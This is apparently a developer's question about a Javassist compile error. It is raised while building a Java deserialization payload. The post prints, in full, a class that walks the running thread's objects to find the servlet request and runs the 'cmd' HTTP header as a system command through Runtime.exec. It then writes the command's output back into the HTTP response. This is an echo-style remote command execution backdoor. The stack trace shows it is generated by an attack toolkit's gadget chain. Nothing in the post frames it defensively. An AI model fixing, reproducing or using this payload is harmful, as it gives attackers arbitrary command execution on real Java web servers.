I want to transform this class using Javassist
public class dfs {
static java.util.HashSet<Object> h;
static javax.servlet.http.HttpServletRequest r;
static javax.servlet.http.HttpServletResponse p;
public dfs(){
r = null;
p = null;
h =new java.util.HashSet<Object>();
F(Thread.currentThread(),0);
}
private static boolean i(Object obj){
if(obj==null|| h.contains(obj)){
return true;
}
h.add(obj);
return false;
}
private static void p(Object o, int depth){
if(depth > 52||(r !=null&& p !=null)){
return;
}
if(!i(o)){
if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){
r = (javax.servlet.http.HttpServletRequest)o;
if(r.getHeader("cmd")==null) {
r = null;
}else{
try {
p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod("getResponse").invoke(r);
} catch (Exception e) {
r = null;
}
}
}
if(r !=null&& p !=null){
try {
p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
p.getWriter().flush();
}catch (Exception e){
}
return;
}
F(o,depth+1);
}
}
private static void F(Object start, int depth){
Class n=start.getClass();
do{
for (java.lang.reflect.Field declaredField : n.getDeclaredFields()) {
declaredField.setAccessible(true);
Object o = null;
try{
o = declaredField.get(start);
if(!o.getClass().isArray()){
p(o,depth);
}else{
for (Object q : (Object[]) o) {
p(q, depth);
}
}
}catch (Exception e){
}
}
}while(
(n = n.getSuperclass())!=null
);
}
}
he transformation code is as follows
CtClass clazz = pool.makeClass("com.xxx.x.Test" + System.nanoTime());
if ((clazz.getDeclaredConstructors()).length != 0) {
clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
}
clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz));
clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;",clazz));
clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;",clazz));
clazz.addMethod(CtMethod.make("private static boolean i(Object obj){ if(obj==null|| h.contains(obj)){ return true; } h.add(obj); return false; }",clazz));
clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){ Class n=start.getClass(); do{ for (Field declaredField : n.getDeclaredFields()) { declaredField.setAccessible(true); Object o = null; try{ o = declaredField.get(start); if(!o.getClass().isArray()){ p(o,depth); }else{ for (Object q : (Object[]) o) { p(q, depth); } } }catch (Exception e){ } } }while( (n = n.getSuperclass())!=null ); }",clazz));
clazz.addMethod(CtMethod.make("private static void p(Object o, int depth){ if(depth > 52||(r !=null&& p !=null)){ return; } if(!i(o)){ if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){ r = (javax.servlet.http.HttpServletRequest)o; if(r.getHeader(\"cmd\")==null) { r = null; }else{ try { p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null); } catch (Exception e) { r = null; } } } if(r !=null&& p !=null){ try { p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"cmd\")).getInputStream()).useDelimiter(\"\\\\A\").next()); p.getWriter().flush(); }catch (Exception e){ } return; } F(o,depth+1); } }",clazz));
clazz.addMethod(CtMethod.make("public dfs(){ r = null; p = null; h =new java.util.HashSet/*<Object>*/(); F(Thread.currentThread(),0); }",clazz));
I encountered the error reported
Exception in thread "main" javassist.CannotCompileException: [source error] ; is missing
at javassist.CtNewMethod.make(CtNewMethod.java:84)
at javassist.CtNewMethod.make(CtNewMethod.java:50)
at javassist.CtMethod.make(CtMethod.java:140)
at com.summersec.attack.deser.echo.AllEcho.genPayload(AllEcho.java:25)
at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:65)
at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:57)
at com.summersec.attack.deser.echo.AllEcho.main(AllEcho.java:36)
Caused by: compile error: ; is missing
at javassist.compiler.Parser.parseDeclarators(Parser.java:643)
at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:600)
at javassist.compiler.Parser.parseFor(Parser.java:380)
at javassist.compiler.Parser.parseStatement(Parser.java:279)
at javassist.compiler.Parser.parseBlock(Parser.java:307)
at javassist.compiler.Parser.parseStatement(Parser.java:261)
at javassist.compiler.Parser.parseDo(Parser.java:351)
at javassist.compiler.Parser.parseStatement(Parser.java:277)
at javassist.compiler.Parser.parseBlock(Parser.java:307)
at javassist.compiler.Parser.parseMethod2(Parser.java:172)
at javassist.compiler.Javac.compileMethod(Javac.java:156)
at javassist.compiler.Javac.compile(Javac.java:102)
at javassist.CtNewMethod.make(CtNewMethod.java:79)
... 6 more